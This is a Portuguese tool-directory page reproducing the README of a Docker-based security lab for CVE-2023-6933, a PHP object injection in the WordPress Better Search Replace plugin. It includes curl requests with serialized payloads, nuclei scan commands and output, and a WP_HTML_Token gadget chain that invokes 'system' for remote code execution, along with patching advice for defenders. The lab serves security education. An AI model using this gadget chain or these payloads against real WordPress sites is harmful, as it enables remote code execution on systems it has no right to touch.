Diretório de Ferramentas
Categorias
vulnerable-bsr-lab-CVE-2023-6933 — Laboratório prático para CVE-2023-6933, uma vulnerabilidade de injeção de objeto PHP no plugin Better Search Replace do WordPress, com implantação Docker, modelo nuclei e scripts de exploração para pesquisa e educação em segurança. | Kitploit
Ferramentas / GitHub / trex96 / vulnerable-bsr-lab-cve-2023-6933
trex96/vulnerable-bsr-lab-cve-2023-6933 vulnerable-bsr-lab-CVE-2023-6933 Laboratório prático para CVE-2023-6933, uma vulnerabilidade de injeção de objeto PHP no plugin Better Search Replace do WordPress, com implantação Docker, modelo nuclei e scripts de exploração para pesquisa e educação em segurança.
5 há 11 mesesDescubra as ferramentas mais usadas pela nossa comunidade.
Últimos 7 Dias Últimos 30 Dias
Laboratório de Vulnerabilidade CVE-2023-6933
Visão Geral
Este ambiente de laboratório demonstra a CVE-2023-6933, uma vulnerabilidade crítica de Injeção de Objetos PHP no plugin Better Search Replace para WordPress, versões ≤ 1.4.4.
Detalhes da Vulnerabilidade
ID CVE : CVE-2023-6933
Pontuação CVSS : 9.8 (Crítica)
Plugin Afetado : Better Search Replace ≤ 1.4.4
Tipo de Vulnerabilidade : Injeção de Objetos PHP via entrada de usuário desserializada
Vetor de Ataque : Endpoint AJAX /wp-admin/admin-ajax.php com ação search_replace_db
Início Rápido
1. Implante o Laboratório
# Clone o repositório
git clone https://github.com/Trex96/vulnerable-bsr-lab-CVE-2023-6933.git
cd vulnerable-bsr-lab-CVE-2023-6933
# Implante usando a imagem Docker Hub (pull automático)
docker-compose up -d
O laboratório irá automaticamente:
Baixar a imagem vulnerável do WordPress do Docker Hub (trex999/vulnerable-bsr-lab:latest)
Configurar WordPress com MySQL e phpMyAdmin
Instalar e ativar o plugin Better Search Replace vulnerável (v1.4.4)
Concluir a instalação em ~60 segundos
2. Acesse o Ambiente
3. Teste a Vulnerabilidade # Execute o POC automatizado
nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v
# Teste manual via curl
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'action=search_replace_db&search_for=O:8:"stdClass":1:{s:6:"marker";s:34:"nuclei_test_payload_demonstration";}&replace_with=test'
Análise Técnica
A Vulnerabilidade O plugin Better Search Replace contém uma vulnerabilidade de Injeção de Objetos PHP em seu manipulador AJAX. A vulnerabilidade ocorre quando:
A entrada do usuário é passada para o parâmetro search_for via POST para /wp-admin/admin-ajax.php
A ação é definida como search_replace_db
A entrada contém objetos PHP serializados que são desserializados sem validação adequada
Isso permite instanciação arbitrária de objetos e potencial execução de código
Métodos de Verificação do POC Nosso modelo nuclei demonstra a vulnerabilidade por meio de múltiplos estágios de verificação:
Detecção do Plugin : Confirma a presença da versão vulnerável do plugin
Teste de Injeção de Objetos : Envia payloads serializados e analisa as respostas
Verificação Comportamental : Confirma o processamento bem-sucedido da desserialização de objetos
Principais Recursos deste Laboratório
Sem Dependência de Erro : O POC demonstra a vulnerabilidade real através de análise comportamental, não de mensagens de erro
Teste Funcional : Usa objetos serializados seguros para verificar a desserialização sem danos ao sistema
Implantação Automatizada : Configuração completa do laboratório com zero configuração manual
Múltiplos Métodos de Teste : Tanto modelos nuclei automatizados quanto comandos curl manuais
Documentação
Referência Rápida
README.md : Este arquivo — início rápido e visão geral
CVE-2023-6933_POC_DOCUMENTATION.md : Documentação técnica completa com análise detalhada do PoC
POC_TEMPLATE_SUMMARY.md : Conformidade de requisitos e confirmação de entrega
Modelo PoC Profissional O modelo nuclei (nuclei-templates/cve-2023-6933.yaml) é estruturado profissionalmente:
Código limpo, sem comentários excessivos
Documentação técnica abrangente em arquivos separados
Formato de modelo pronto para produção
Conformidade total com padrões de pesquisa em segurança
Resultados dos Testes
Execução Bem-sucedida do POC $ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v
[CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
[CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
[CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[INF] Scan completed in 67ms. 4 matches found.
✅ Detecta a versão vulnerável do plugin
✅ Confirma a capacidade de injeção de objetos através da análise de resposta
✅ Demonstra vulnerabilidade funcional sem dependência de erros
✅ Fornece verificação comportamental da desserialização bem-sucedida
Aviso de Segurança ⚠️ AVISO : Este ambiente contém software intencionalmente vulnerável. Use apenas em ambientes de teste isolados. Não implante em produção ou sistemas acessíveis pela Internet.
Limpeza
Referências
Criado para fins educacionais e de pesquisa em segurança
Ambiente Docker (Docker_LAB_SETUP/)
WordPress 6.4.0 com Better Search Replace 1.4.3 vulnerável
Servidor MySQL 8.0
phpMyAdmin para gerenciamento do banco de dados
Ambiente vulnerável pré-configurado
Scripts de Exploit
cve_2023_6933_exploit.php — Kit de ferramentas abrangente de exploração PHP
wp_html_token_poc.php — Demonstração de RCE para WordPress 6.4.0+
bsr_direct_exploit.php — Teste direto de vulnerabilidade
Ferramentas de Detecção
nuclei-templates/cve-2023-6933.yaml — Modelo nuclei avançado
manual-test.sh — Script de teste manual abrangente
🎯 Metodologia de Exploração Adequada Este laboratório demonstra detecção baseada em sucesso seguindo as melhores práticas para pesquisa de vulnerabilidades:
1. Detecção Baseada em Sucesso Em vez de depender de erros HTTP 500, nossas ferramentas detectam:
Processamento bem-sucedido do payload
Desserialização de objetos serializados
Padrões de resposta da aplicação
Evidências de exploração funcional
2. Cadeia RCE WP_HTML_Token Utilizando a classe WP_HTML_Token do WordPress 6.4.0+ para RCE real:
O:13:"WP_HTML_Token":4:{
s:13:"bookmark_name";s:14:"touch /tmp/rce";
s:9:"node_name";s:8:"testnode";
s:21:"has_self_closing_flag";b:0;
s:10:"on_destroy";s:6:"system";
}
3. Múltiplos Vetores de Ataque
Exploração do endpoint AJAX (admin-ajax.php)
Manipulação direta da interface do plugin
Injeção no banco de dados via operações de busca/substituição
🔬 Abordagem de Teste
Teste Manual # Testar presença básica do plugin
curl "http://localhost:8080/wp-content/plugins/better-search-replace/readme.txt"
# Testar vulnerabilidade com payload seguro
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-d "action=bsr_search_replace&search_for=O:8:\"stdClass\":1:{s:4:\"test\";s:8:\"nuclei\";}&replace_with=safe&select_tables[]=wp_posts&dry_run=1"
Recursos do Modelo Nuclei
Teste multivetor : 5 requisições HTTP diferentes
Correspondentes baseados em sucesso : Procura por processamento funcional, não por erros
Extração abrangente : Detecção de versão, análise de resposta
Payloads seguros : Abordagem de teste não destrutiva
Recursos de Teste Manual
Detecção e validação de versão do plugin
Geração e teste de múltiplos payloads
Demonstração da RCE via WP_HTML_Token
Verificação abrangente da vulnerabilidade
📊 Pontos de Acesso do Laboratório
🛡️ Considerações de Segurança
Para Pesquisadores
Este é um ambiente deliberadamente vulnerável
Use apenas em redes isoladas/controladas
Não para ambientes de produção
Apenas para fins educacionais
Para Defensores
Atualize Better Search Replace para ≥ 1.4.5
Implemente regras de WAF para dados serializados
Monitore padrões de injeção de objetos
Auditorias regulares de segurança em plugins WordPress
📚 Valor Educacional Este laboratório oferece experiência prática com:
Vulnerabilidades de Injeção de Objetos PHP
Análise de segurança de plugins WordPress
Ataques de serialização/desserialização
Exploração de cadeias de gadgets
Automação de detecção de vulnerabilidades
Metodologias de teste de segurança
Autor : Trex
Versão do Laboratório : 2.0 — Metodologia POC Aprimorada